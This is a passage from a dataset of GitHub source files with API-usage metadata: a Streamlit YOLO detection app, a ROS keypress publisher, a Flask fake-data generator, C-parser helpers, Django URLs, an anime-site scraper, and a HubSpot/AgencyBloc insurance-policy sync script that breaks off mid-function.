"django.contrib.auth.logout", "line_number": 279, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 280, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 280, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 277, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 283, "usage_type": "call"}, {"api_name": "chat.forms.ChangeUserProfilePic", "line_number": 288, "usage_type": "name"}, {"api_name": "chat.forms.ChangeUserDisplayName", "line_number": 289, "usage_type": "name"}, {"api_name": "chat.models.UserProfile.objects.filter", "line_number": 293, "usage_type": "call"}, {"api_name": "chat.models.UserProfile.objects", "line_number": 293, "usage_type": "attribute"}, {"api_name": "chat.models.UserProfile", "line_number": 293, "usage_type": "name"}, {"api_name": "chat.models.UserProfile.objects.get", "line_number": 300, "usage_type": "call"}, {"api_name": "chat.models.UserProfile.objects", "line_number": 300, "usage_type": "attribute"}, {"api_name": "chat.models.UserProfile", "line_number": 300, "usage_type": "name"}, {"api_name": "chat.forms.ChangeUserDisplayName", "line_number": 303, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 309, "usage_type": "call"}, {"api_name": "chat.forms.ChangeUserProfilePic", "line_number": 314, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 320, "usage_type": "call"}, {"api_name": "chat.forms.ChangeUserDisplayName", "line_number": 324, "usage_type": "call"}, {"api_name": "chat.forms.ChangeUserProfilePic", "line_number": 325, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 328, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 285, "usage_type": "name"}]}
+{"seq_id": "17849982475", "text": "\r\nimport streamlit as st\r\nimport PIL\r\nfrom ultralytics import YOLO\r\n\r\n\r\nst.set_page_config(\"Object detection\",\r\n layout=\"wide\",\r\n initial_sidebar_state=\"expanded\"\r\n )\r\nwith st.sidebar:\r\n st.header(\"Image/Video Config\") #heading to the sidebar\r\n source_img = st.file_uploader(\"Choose an Image..\",type = (\"jpg\",\"jpeg\",\"png\"))\r\n\r\nst.title(\"Welcome to Object detection ARENA!\")\r\n\r\ncol1,col2 = st.columns(2)\r\n\r\nwith col1:\r\n if source_img:\r\n uploaded_image = PIL.Image.open(source_img)\r\n st.image(source_img,\r\n caption=\"Uploaded Image\",\r\n use_column_width=True\r\n )\r\nmodel = YOLO(\"yolov8l.pt\")\r\n\r\nif st.sidebar.button('Detect Objects'):\r\n res = model.predict(uploaded_image)\r\n boxes = res[0].boxes\r\n res_plotted = res[0].plot()[:,:,::-1]\r\n with col2:\r\n st.image(res_plotted,caption=\"Detected Image\",\r\n use_column_width=True\r\n )\r\n try:\r\n with st.expander(\"Detection Results\"):\r\n for box in boxes:\r\n st.write(box.xywh)\r\n except Exception as ex:\r\n st.write(\"No image is uploaded yet!\")\r\n", "repo_name": "iizsandu/Apple-Detection-using-YOLO", "sub_path": "app2.py", "file_name": "app2.py", "file_ext": "py", "file_size_in_byte": 1223, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "streamlit.set_page_config", "line_number": 7, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 11, "usage_type": "attribute"}, {"api_name": "streamlit.header", "line_number": 12, "usage_type": "call"}, {"api_name": "streamlit.file_uploader", "line_number": 13, "usage_type": "call"}, {"api_name": "streamlit.title", "line_number": 15, "usage_type": "call"}, {"api_name": "streamlit.columns", "line_number": 17, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 21, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 21, "usage_type": "attribute"}, {"api_name": "streamlit.image", "line_number": 22, "usage_type": "call"}, {"api_name": "ultralytics.YOLO", "line_number": 26, "usage_type": "call"}, {"api_name": "streamlit.sidebar.button", "line_number": 28, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 28, "usage_type": "attribute"}, {"api_name": "streamlit.image", "line_number": 33, "usage_type": "call"}, {"api_name": "streamlit.expander", "line_number": 37, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 39, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 41, "usage_type": "call"}]}
+{"seq_id": "9065771340", "text": "#!/usr/bin/env python3\n\nimport rospy\nfrom std_msgs.msg import String\nfrom pynput import keyboard\n\ndef on_key_event(key, is_press):\n try:\n key_str = key.char # Get character key\n except AttributeError:\n key_str = str(key) # Use other key representation\n\n event_type = \"pressed\" if is_press else \"released\"\n rospy.loginfo(f\"Key {key_str} {event_type}\")\n\n key_publisher.publish(key_str)\n\ndef on_key_press(key):\n on_key_event(key, True)\n\ndef on_key_release(key):\n on_key_event(key, False)\n\nrospy.init_node('keyboard_publisher', anonymous=True)\nkey_publisher = rospy.Publisher('/keypress', String, queue_size=10)\n\nwith keyboard.Listener(on_press=on_key_press, on_release=on_key_release) as listener:\n rospy.spin()\n", "repo_name": "mhopki/clodpkg", "sub_path": "src/key_pub.py", "file_name": "key_pub.py", "file_ext": "py", "file_size_in_byte": 749, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "rospy.loginfo", "line_number": 14, "usage_type": "call"}, {"api_name": "rospy.init_node", "line_number": 24, "usage_type": "call"}, {"api_name": "rospy.Publisher", "line_number": 25, "usage_type": "call"}, {"api_name": "std_msgs.msg.String", "line_number": 25, "usage_type": "argument"}, {"api_name": "pynput.keyboard.Listener", "line_number": 27, "usage_type": "call"}, {"api_name": "pynput.keyboard", "line_number": 27, "usage_type": "name"}, {"api_name": "rospy.spin", "line_number": 28, "usage_type": "call"}]}
+{"seq_id": "27961988379", "text": "from app import app\nfrom flask import render_template, request, jsonify, make_response, send_file\nimport pandas as pd\n\nimport app.data_gen as db_requests\nfrom config import Config\n\nCOLUMNS = ['Id', 'Initials', 'Address', 'Tel-number']\n\ncur_table_gen, gen_seed = None, None\ndata = pd.DataFrame(columns=COLUMNS)\n\ndef get_generated_data(size: int):\n global data, cur_table_gen\n fake_data = [next(cur_table_gen) for _ in range(size)]\n return fake_data, data.append(\n pd.DataFrame([(user.id, user.initials, user.address, user.telnumber) for user in fake_data], columns=COLUMNS),\n ignore_index=True\n )\n\n@app.route('/')\ndef home():\n context = {\n 'size': request.args.get('size', 20),\n 'seed': request.args.get('seed', 1)\n }\n\n return render_template('home.html', **context)\n\n@app.route('/api/generate_fake_data')\ndef generate_fake_data():\n global cur_table_gen, gen_seed, data\n try:\n size = int(request.args.get('size'), 20)\n except Exception as e:\n return make_response(jsonify({'message': e.__str__()}), 403)\n \n fake_data, data = get_generated_data(size)\n \n return make_response(\n jsonify({'data': [data.to_dict() for data in fake_data]}),\n 200,\n )\n\n@app.route('/api/refresh_and_generate_fake_data')\ndef refresh_and_generate_fake_data():\n global cur_table_gen, gen_seed, data\n try:\n seed = int(request.args.get('seed', 0))\n size = int(request.args.get('size'), 20)\n except Exception as e:\n return make_response(jsonify({'message': e.__str__()}), 403)\n \n cur_table_gen = db_requests.gen_fake_data(seed)\n gen_seed = seed\n data = pd.DataFrame(columns=COLUMNS)\n \n fake_data, data = get_generated_data(size)\n \n return make_response(\n jsonify({'data': [data.to_dict() for data in fake_data]}),\n 200,\n )\n \n\n@app.route('/download')\ndef download_excel():\n file_path = Config.EXCEL_PATH + 'excel_data.xlsx'\n with pd.ExcelWriter(file_path) as writer:\n data.to_excel(writer)\n \n return send_file(file_path, as_attachment=True)", "repo_name": "PapaUlito4ka/FakeDataGenerator", "sub_path": "app/routes.py", "file_name": "routes.py", "file_ext": "py", "file_size_in_byte": 2101, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pandas.DataFrame", "line_number": 11, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 17, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 24, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 24, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 24, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 25, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 25, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 25, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 28, "usage_type": "call"}, {"api_name": "app.app.route", "line_number": 21, "usage_type": "call"}, {"api_name": "app.app", "line_number": 21, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 34, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 34, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 34, "usage_type": "name"}, {"api_name": "flask.make_response", "line_number": 36, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 36, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 40, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 41, "usage_type": "call"}, {"api_name": "app.app.route", "line_number": 30, "usage_type": "call"}, {"api_name": "app.app", "line_number": 30, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 49, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 49, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 49, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 50, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 50, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 50, "usage_type": "name"}, {"api_name": "flask.make_response", "line_number": 52, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 52, "usage_type": "call"}, {"api_name": "app.data_gen.gen_fake_data", "line_number": 54, "usage_type": "call"}, {"api_name": "app.data_gen", "line_number": 54, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 56, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 60, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 61, "usage_type": "call"}, {"api_name": "app.app.route", "line_number": 45, "usage_type": "call"}, {"api_name": "app.app", "line_number": 45, "usage_type": "name"}, {"api_name": "config.Config.EXCEL_PATH", "line_number": 68, "usage_type": "attribute"}, {"api_name": "config.Config", "line_number": 68, "usage_type": "name"}, {"api_name": "pandas.ExcelWriter", "line_number": 69, "usage_type": "call"}, {"api_name": "flask.send_file", "line_number": 72, "usage_type": "call"}, {"api_name": "app.app.route", "line_number": 66, "usage_type": "call"}, {"api_name": "app.app", "line_number": 66, "usage_type": "name"}]}
+{"seq_id": "39076869486", "text": "from c_token import Tok\nfrom collections import deque\nfrom typing import List\nfrom c_logging import log_error\n\ndef get_whole_name(tokens: deque) -> str:\n name = \"\"\n token = tokens[0]\n while (token.val != Tok.semicolon \n and token.val != Tok.left_paren\n and token.val != Tok.right_paren\n and token.val != Tok.space\n and token.val != Tok.greater_than\n and token.val != Tok.less_than\n and token.val != Tok.left_bracket\n and token.val != Tok.right_bracket\n and token.val != Tok.left_bracket_sq\n and token.val != Tok.right_bracket_sq\n and token.val != Tok.pound\n and token.val != Tok.newline):\n\n name += token.string\n tokens.popleft()\n token = tokens[0]\n return name\n\ndef eat_white_space(tokens: deque) -> None:\n while tokens[0].string.isspace():\n tokens.popleft()\ndef eat_after_semicolon(tokens: deque) -> None:\n while tokens[0].val != Tok.semicolon:\n tokens.popleft()\n tokens.popleft()\n\"\"\"\nExpects to start with an opening parenthesis\n\nEats tokens until reaching a ')'\nEats the closing parenthesis as well\n\"\"\"\ndef get_func_args(tokens: deque) -> List:\n eat_white_space(tokens)\n open_paren = tokens.popleft()\n if open_paren.val != Tok.left_paren:\n log_error(open_paren, \"Expected an opening parenthesis\")\n token = tokens[0]\n args = []\n while token.string != \")\":\n while token.string == \",\" or token.string.isspace():\n tokens.popleft()\n token = tokens[0]\n args.append(get_func_arg(tokens))\n token = tokens[0]\n tokens.popleft()\n return args\n\ndef get_func_arg(tokens: deque) -> str:\n arg = \"\"\n while 1:\n token = tokens[0]\n if token.string == \",\":\n return arg\n elif token.string == \")\":\n return arg\n elif token.val == Tok.identifier:\n arg += token.string\n else:\n arg += token.string\n tokens.popleft()\n\ndef insert_address(reference_count) -> str:\n string = \"\"\n if reference_count > 1:\n for _ in range(1, reference_count):\n string += \"*\"\n elif reference_count == 0:\n string += \"&\"\n return string\ndef insert_copy(reference_count) -> str:\n string = \"\"\n if reference_count >= 1:\n for _ in range(0, reference_count):\n string += \"*\"\n return string\n", "repo_name": "NathanJWr/meta-c", "sub_path": "src/c_parser_utils.py", "file_name": "c_parser_utils.py", "file_ext": "py", "file_size_in_byte": 2396, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "collections.deque", "line_number": 6, "usage_type": "name"}, {"api_name": "c_token.Tok.semicolon", "line_number": 9, "usage_type": "attribute"}, {"api_name": "c_token.Tok", "line_number": 9, "usage_type": "name"}, {"api_name": "c_token.Tok.left_paren", "line_number": 10, "usage_type": "attribute"}, {"api_name": "c_token.Tok", "line_number": 10, "usage_type": "name"}, {"api_name": "c_token.Tok.right_paren", "line_number": 11, "usage_type": "attribute"}, {"api_name": "c_token.Tok", "line_number": 11, "usage_type": "name"}, {"api_name": "c_token.Tok.space", "line_number": 12, "usage_type": "attribute"}, {"api_name": "c_token.Tok", "line_number": 12, "usage_type": "name"}, {"api_name": "c_token.Tok.greater_than", "line_number": 13, "usage_type": "attribute"}, {"api_name": "c_token.Tok", "line_number": 13, "usage_type": "name"}, {"api_name": "c_token.Tok.less_than", "line_number": 14, "usage_type": "attribute"}, {"api_name": "c_token.Tok", "line_number": 14, "usage_type": "name"}, {"api_name": "c_token.Tok.left_bracket", "line_number": 15, "usage_type": "attribute"}, {"api_name": "c_token.Tok", "line_number": 15, "usage_type": "name"}, {"api_name": "c_token.Tok.right_bracket", "line_number": 16, "usage_type": "attribute"}, {"api_name": "c_token.Tok", "line_number": 16, "usage_type": "name"}, {"api_name": "c_token.Tok.left_bracket_sq", "line_number": 17, "usage_type": "attribute"}, {"api_name": "c_token.Tok", "line_number": 17, "usage_type": "name"}, {"api_name": "c_token.Tok.right_bracket_sq", "line_number": 18, "usage_type": "attribute"}, {"api_name": "c_token.Tok", "line_number": 18, "usage_type": "name"}, {"api_name": "c_token.Tok.pound", "line_number": 19, "usage_type": "attribute"}, {"api_name": "c_token.Tok", "line_number": 19, "usage_type": "name"}, {"api_name": "c_token.Tok.newline", "line_number": 20, "usage_type": "attribute"}, {"api_name": "c_token.Tok", "line_number": 20, "usage_type": "name"}, {"api_name": "collections.deque", "line_number": 27, "usage_type": "name"}, {"api_name": "collections.deque", "line_number": 30, "usage_type": "name"}, {"api_name": "c_token.Tok.semicolon", "line_number": 31, "usage_type": "attribute"}, {"api_name": "c_token.Tok", "line_number": 31, "usage_type": "name"}, {"api_name": "collections.deque", "line_number": 40, "usage_type": "name"}, {"api_name": "c_token.Tok.left_paren", "line_number": 43, "usage_type": "attribute"}, {"api_name": "c_token.Tok", "line_number": 43, "usage_type": "name"}, {"api_name": "c_logging.log_error", "line_number": 44, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 40, "usage_type": "name"}, {"api_name": "collections.deque", "line_number": 56, "usage_type": "name"}, {"api_name": "c_token.Tok.identifier", "line_number": 64, "usage_type": "attribute"}, {"api_name": "c_token.Tok", "line_number": 64, "usage_type": "name"}]}
+{"seq_id": "5133413839", "text": "from django.conf.urls import patterns, include, url\nfrom django.views.generic import TemplateView\nfrom portfolio.views import *\n\n# orzubalskydotcom application\nurlpatterns = patterns('portfolio.views',\n url(r'bio$', TemplateView.as_view(template_name=\"bio.html\"), name='bio'),\n url(r'statement$', TemplateView.as_view(template_name=\"statement.html\"), name='statement'), \n url(r'project/(?P[0-9A-Za-z\\-]+)$', ProjectDetail.as_view(), name='project-detail'),\n url(r'experiment/(?P[0-9A-Za-z\\-]+)$', ExperimentDetail.as_view(), name='experiment-detail'),\n url(r'$', 'project_list', name='project-list'),\n)", "repo_name": "orzubalsky/fungi", "sub_path": "website/apps/portfolio/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 632, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "django.conf.urls.patterns", "line_number": 6, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 7, "usage_type": "call"}, {"api_name": "django.views.generic.TemplateView.as_view", "line_number": 7, "usage_type": "call"}, {"api_name": "django.views.generic.TemplateView", "line_number": 7, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 8, "usage_type": "call"}, {"api_name": "django.views.generic.TemplateView.as_view", "line_number": 8, "usage_type": "call"}, {"api_name": "django.views.generic.TemplateView", "line_number": 8, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 9, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 10, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call"}]}
+{"seq_id": "4066336402", "text": "from bs4 import BeautifulSoup\nfrom controllers import AnimeScraper, ReviewScraper, UserScraper, WatchlistScraper\nfrom math import ceil\nfrom os import remove\nfrom pandas import read_csv\nfrom requests import get\nfrom os import getenv\n\n# Globals\nBASE_URL = 'https://myanimelist.net'\n\n# Scrape animes\ndef get_animes()->None:\n '''\n Scrape all animes\n\n This function will get a list of genres using Requests.get()\n and BeautifulSoup(), then call the AnimeScraper() object\n to scrape all animes of each genres. Each genre's animes\n will be stored in a CSV file\n '''\n # Function to process retrieved genres in a helpful list format\n get_types = lambda types:sorted([{\n 'name':t.string[:t.string.index('(')-1], \n 'pages':ceil(int(t.string[t.string.index(\"(\")+1:t.string.index(\")\")].replace(',', ''))/100),\n 'link':BASE_URL+t['href']\n } for t in types], key=lambda x:x['pages'])\n # Generate anime soup using Requests.get() and BeautifulSoup() \n page = get(f'{BASE_URL}/anime.php')\n soup = BeautifulSoup(page.text, 'html.parser')\n # Get anime genres using soup\n filters = soup.select('.genre-link')\n genres = get_types([item for f in filters[:2] for item in f.select('.genre-name-link')])\n # Start anime scraper\n AnimeScraper().scrape_info(genres)\n\ndef get_reviews_from_animes()->None:\n '''\n Scrape reviews from animes\n\n This function will call the ReviewScraper() object to scrape \n reviews from the scraped animes. This scraper will only retrieve \n the top 'Recommended', 'Mixed Feelings', and 'Not Recommended' \n reviews while ignoring the reviews with preliminary tag on them if\n the anime has finished airing (since preliminary means that the reviewer \n hasn't finished the anime).\n '''\n animes = read_csv(\"./data/reviews/animes.csv\", sep=\";\", index_col=0)\n ReviewScraper().scrape_from_animes(animes.to_dict('records'))\n\n \n# page = 22\n# running = True\n# while running: \n# for status in ['recommended', 'mixed_feelings', 'not_recommended']: \n# try:\n# animes = read_csv(f\"./data/reviews/{status}/{status}_{page}.csv\", sep='$', index_col=0, names=['title', 'link', 'preliminary'])\n# ReviewScraper().scrape_more_reviews_from_animes(animes.to_dict('records'), status, page)\n# remove(f'./data/reviews/{status}/checkpoint.json')\n# except FileNotFoundError:\n# running = False\n# break\n# page += 1\n\ndef get_users_by_locations()->None:\n '''\n Scrape users by locations\n\n This function will call the UserScraper() object to scrape \n users by locations listed in the array.\n '''\n locations = ['Indonesia', 'Malaysia', 'Singapore', 'Thailand', 'Vietnam', 'Manila', 'Germany', 'France']\n UserScraper('watchlists', 'locations').scrape_from_locations(locations)\n\ndef get_watchlists()->None:\n '''\n Scrape user's animelist\n\n This function will call the WatchlistScraper() object to scrape \n each user's animelist data. The scraped data will be stored in a\n CSV file that is named based on the time of scraping. There are \n also some animelist that cannot be scraped (edge cases) due to \n personalized anime watchlists.\n '''\n users = read_csv(\"./data/watchlists/users.csv\", sep=\";\", index_col=0)\n WatchlistScraper().get_watchlists(users.to_dict('records'))\n\nget_watchlists()", "repo_name": "Matthew1906/MyAnimeListScraper", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 3391, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "math.ceil", "line_number": 25, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 29, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 30, "usage_type": "call"}, {"api_name": "controllers.AnimeScraper", "line_number": 35, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 48, "usage_type": "call"}, {"api_name": "controllers.ReviewScraper", "line_number": 49, "usage_type": "call"}, {"api_name": "controllers.UserScraper", "line_number": 73, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 85, "usage_type": "call"}, {"api_name": "controllers.WatchlistScraper", "line_number": 86, "usage_type": "call"}]}
+{"seq_id": "14289998899", "text": "from helpers import foldl, safemap, hs_get, ab_post, hs_path\nimport agency_bloc as ab\nimport hubspot as hs\nimport hubspot_migrate as hsm\nimport json\nimport time\n\n\ndef agent_checker(pdic, hb_dict, ab_dict):\n hb_agent_id = pdic['properties'].get('agent_originating')\n if not hb_agent_id:\n print(\"No agent specified in Hubspot\")\n email = hb_dict.get(hb_agent_id, {}).get('email')\n return hb_agent_id, ab_dict.get(email)\n\n\nmsp_id = \"2-8483761\"\ndvh_id = \"2-8483915\"\nmap_id = \"2-7775359\"\ncopay_id = \"2-8483892\"\npdp_id = \"2-8567541\"\n\nlabel_dic = {\n '2-7775359': 'MAP',\n '2-8483761': 'MSP',\n '2-8483892': 'COPAY',\n '2-8483915': 'DVH',\n '2-8567541': 'PDP'\n}\noid_dic = {\n 'COPAY': '2-8483892',\n 'DVH': '2-8483915',\n 'MAP': '2-7775359',\n 'MSP': '2-8483761',\n 'PDP': '2-8567541',\n 'MAPD': '2-7775359'\n}\n\ncommission_field = 'commission_id__if_applicable_'\n\ndef get_status(props):\n out = props.get('status')\n if not out:\n out = props.get('plan__status')\n return out\n\n\ndef load_hubspot(object_label, k=.2):\n object_label = object_label.upper()\n object_id = oid_dic.get(object_label)\n assert object_id\n props_raw = hs_get(\"properties/\"+object_id).json()[\"results\"]\n props = sorted([x[\"name\"] for x in props_raw])\n path = hs_path(\"objects/\"+object_id+\"/search\")\n data = {\n 'limit': 100,\n 'sorts': [{'propertyName': 'hs_object_id', 'direction': 'ASCENDING'}],\n 'properties': props\n }\n existing_map, _ = hsm.batch_search(path, data, k = k)\n for x in existing_map:\n x['link'] = 'https://app.hubspot.com/contacts/7879306/record/'+oid_dic[object_label]+'/'+x['id']\n return existing_map\n\ndef load_agency_bloc(object_label):\n path = \"policies/search\"\n object_label = object_label.upper()\n assert object_label in oid_dic\n r = ab_post(path, policyCoverageType=object_label)\n return json.loads(r.text)\n \"\"\"\n try:\n aa = json.loads(r.text)\n batches = [aa[i:i+2000] for i in range(0,len(aa),2000)]\n deets = []\n for i,batch in enumerate(batches):\n ai = [x['policyID'] for x in batch]\n deet1 = ab.policy_details(*ai)\n deets = deets + deet1\n print(\"loaded batch\", i+1, \"of\",len(batches))\n print(\"waiting for\", timeout,\"seconds because of antiquated rate limit\")\n time.sleep(timeout)\n return deets\n except Exception as ee:\n print(\"default\")\n print(ee)\n return r.text\n \"\"\"\n\n\ndef upstrip(maybe_string):\n if type(maybe_string) == str:\n return maybe_string.strip().upper()\n else:\n return maybe_string\n\n\ndef parse_hubspot_fields(h_array, olabel):\n hvp = {}\n hdic = {}\n dups = {}\n for x in h_array:\n props = x['properties']\n k = upstrip(get_commission_field(props, olabel))\n k2 = upstrip(props.get('carrier'))\n if k and k2:\n kk = (k.upper().strip(), k2.upper().strip())\n if kk in hvp:\n hvp.pop(kk)\n x0 = hdic.pop(kk)\n dups[kk] = [x0,x]\n else:\n hvp[kk] = get_status(props)\n hdic[kk] = x\n valid_dup_keys = [k for k in dups.keys() if any(c.isdigit() for c in k[0])]\n dup_errors = {}\n for k in valid_dup_keys:\n ss = []\n v = dups[k]\n for i in range(0, len(v)):\n p_ = v[i]['properties']\n ss.append(get_status(p_))\n if not foldl(lambda a,b: bool(a) and bool(b), True, ss):\n dup_errors[k] = x\n else:\n x = dups.get(k)\n props = x[0]['properties']\n hvp[k] = get_status(props)\n hdic[k] = x[0]\n return hvp, hdic, dup_errors\n\ndef parse_agencybloc_fields(a_array):\n avp = {}\n adic = {}\n dups = {}\n for x in a_array:\n k = x.get('policyNumber')\n k2 = x.get('carrier')\n if k:\n kk = (k.upper().strip(), k2.upper().strip())\n if kk in avp:\n avp.pop(kk)\n x1 = adic.pop(kk)\n dups[kk] = [x,x1]\n elif kk in dups:\n dups[kk].append(x)\n else:\n avp[kk] = x.get('policyStatus')\n adic[kk] = x\n to_archive = []\n for k, arr in dups.items():\n added = False\n for x in arr:\n status = x.get('policyStatus')\n if status == '200' and not added:\n adic[k] = x\n avp[k] = '200'\n else:\n to_archive.append(x)\n to_archive = list(filter(lambda x: not bool(x.get('policyStatus') == 'Archive'), to_archive))\n return avp, adic, to_archive\n\n\n\ndef get_contacts(hdic):\n cids = []\n for x in hdic.values():\n if type(x) == list:\n for d in x:\n cid = d.get('properties', {}).get('originally_associated_contact_id')\n if cid:\n cids.append(cid)\n else:\n cid = x.get('properties', {}).get('originally_associated_contact_id')\n if cid:\n cids.append(cid)\n fdata_raw,_ = hs.batch_contacts(cids)\n fdata = {x['id']:x for x in fdata_raw}\n for x in hdic.values():\n if x:\n if type(x) == dict:\n ii = x.get('properties', {}).get('originally_associated_contact_id')\n x['contact'] = fdata.get(ii)\n else:\n for d in x:\n ii = d.get('properties', {}).get('originally_associated_contact_id')\n d['contact'] = fdata.get(ii)\n return fdata\n\n\n\ndef contact_filter(dic, hdic):\n return dict(filter(lambda tup: hdic[tup[0]].get('contact'), dic.items()))\n\n\ndef create_batch_inner(aa, olabel, **kargs):\n oid = oid_dic[olabel.upper()]\n rr = ab.create_policies(aa, olabel.upper(), oid, limit_per_host=10, **kargs)\n success, err = [], []\n for r, s in zip(rr, aa):\n if r[0]:\n success.append((r[1], s))\n else:\n err.append((r[1], s))\n return success, err\n\ndef create_batch(aa, olabel, **kargs):\n s, e = create_batch_inner(aa, olabel, **kargs)\n for i in range(0,10):\n if e:\n s1, e = create_batch_inner(e, olabel, **kargs)\n s = s + s1\n return s, e\n\ndef update_batch_inner(uu):\n rr = ab.update_policies(uu, limit_per_host=10)\n success, err = [],[]\n for r,s in zip(rr, uu):\n if r[0]:\n success.append((r[1], s))\n else:\n err.append(s)\n return success, err\n\ndef update_batch(uu):\n s,e = update_batch_inner(uu)\n for i in range(0,10):\n if e:\n s1,e = update_batch_inner(e)\n s = s + s1\n return s,e\n\ndef parse_duplicates_to_remove(adups):\n out = []\n for k,v in adups.items():\n if len(v) > 1:\n out = out + v[1:]\n return out\n\ndef archive_batch(archiveids):\n aa = []\n for pid in archiveids:\n dic = {\n 'ab_policy_id': pid,\n 'properties': {'status': 'ARCHIVE'}\n }\n aa.append(dic)\n s,e = update_batch_inner(aa)\n for i in range(0,10):\n if e:\n s1, e = update_batch_inner(e)\n s = s + s1\n return s,e\n\ndef dedup_batch(dups_to_remove):\n aa = []\n for a in dups_to_remove:\n pid = a.get('policyID')\n if not pid:\n pid = a.get('PolicyID')\n if pid:\n dic = {\n 'ab_policy_id': pid,\n 'properties': {'status': 'ARCHIVE'}\n }\n aa.append(dic)\n s,e = update_batch_inner(aa)\n for i in range(0,10):\n if e:\n s1,e = update_batch_inner(e)\n s = s + s1\n return s,e\n\ndef show_active_hb_only(hvp, avp):\n out = {}\n ss = set(hvp) - set(avp)\n for k in ss:\n v = hvp[k]\n if v == '200':\n out[k] = v\n return out\n\ndef show_matches(hvp, avp):\n ss = set(avp).union(set(hvp))\n out = {}\n for k in ss:\n i = strip(avp.get(k))\n j = strip(avp.get(k))\n if i and j and i==j:\n out[k] = i\n return out\n\ndef show_ab_only(hvp, avp):\n ss = set(avp) - set(hvp)\n return {k:v for k,v in avp.items() if k in ss and v.lower() != 'archive'}\n\ndef strip(x):\n if type(x) == str:\n return x.strip()\n else:\n return x\ndef show_mismatching_status(hvp, avp):\n ss = set(hvp).intersection(set(avp))\n out = {}\n\n for k in ss:\n i = strip(hvp[k])\n j = strip(avp[k])\n if j.lower() == 'none':\n j = None\n if i != j:\n out[k] = (i,j)\n return out\n\ndef process_matches(hvp, avp):\n create = show_active_hb_only(hvp, avp)\n change_status = show_mismatching_status(hvp, avp)\n archive = show_ab_only(hvp, avp)\n archive = archive\n return create, change_status, archive\n\ndef load_and_process_hubspot(olabel):\n hh = load_hubspot(olabel)\n hvp, hdic, hdups = parse_hubspot_fields(hh, olabel)\n return hvp, hdic, hdups, hh\n\ndef load_and_proces_ab(olabel):\n aa = load_agency_bloc(olabel)\n avp, adic, to_archive = parse_agencybloc_fields(aa)\n return avp, adic, to_archive, aa\n\ndef combine_load_process(olabel):\n hvp, hdic, _, hh = load_and_process_hubspot(olabel)\n get_contacts(hdic)\n avp, adic, to_archive, aa = load_and_proces_ab(olabel)\n for x in avp:\n ax = adic.get(x)\n hx = hdic.get(x)\n if hx:\n hdic[x]['ab_policy_id'] = ax.get('policyID')\n\n create0, update, archive = process_matches(hvp, avp)\n create = contact_filter(create0, hdic)\n return create, create0, update, archive, hdic, adic, to_archive, hh, aa\n\ndef safe_up(s):\n if type(s) == str:\n ss = s.upper().strip()\n if ss == 'NONE':\n return None\n else:\n return ss\n else:\n return s\n\ndef hb_load_policies(olabel, hb_show_active_only):\n hs_check = load_hubspot(olabel)\n hid = {}\n hdic = {}\n for x in hs_check:\n carrier = x['properties']['carrier']\n pnumber = ab.get_commission_field(x['properties'], olabel)\n k = (safe_up(carrier), pnumber)\n hdic[k] = hdic.get(k, []) + [x]\n arr = hid.get(k, [])\n pid = x['id']\n status = x['properties'].get('status')\n 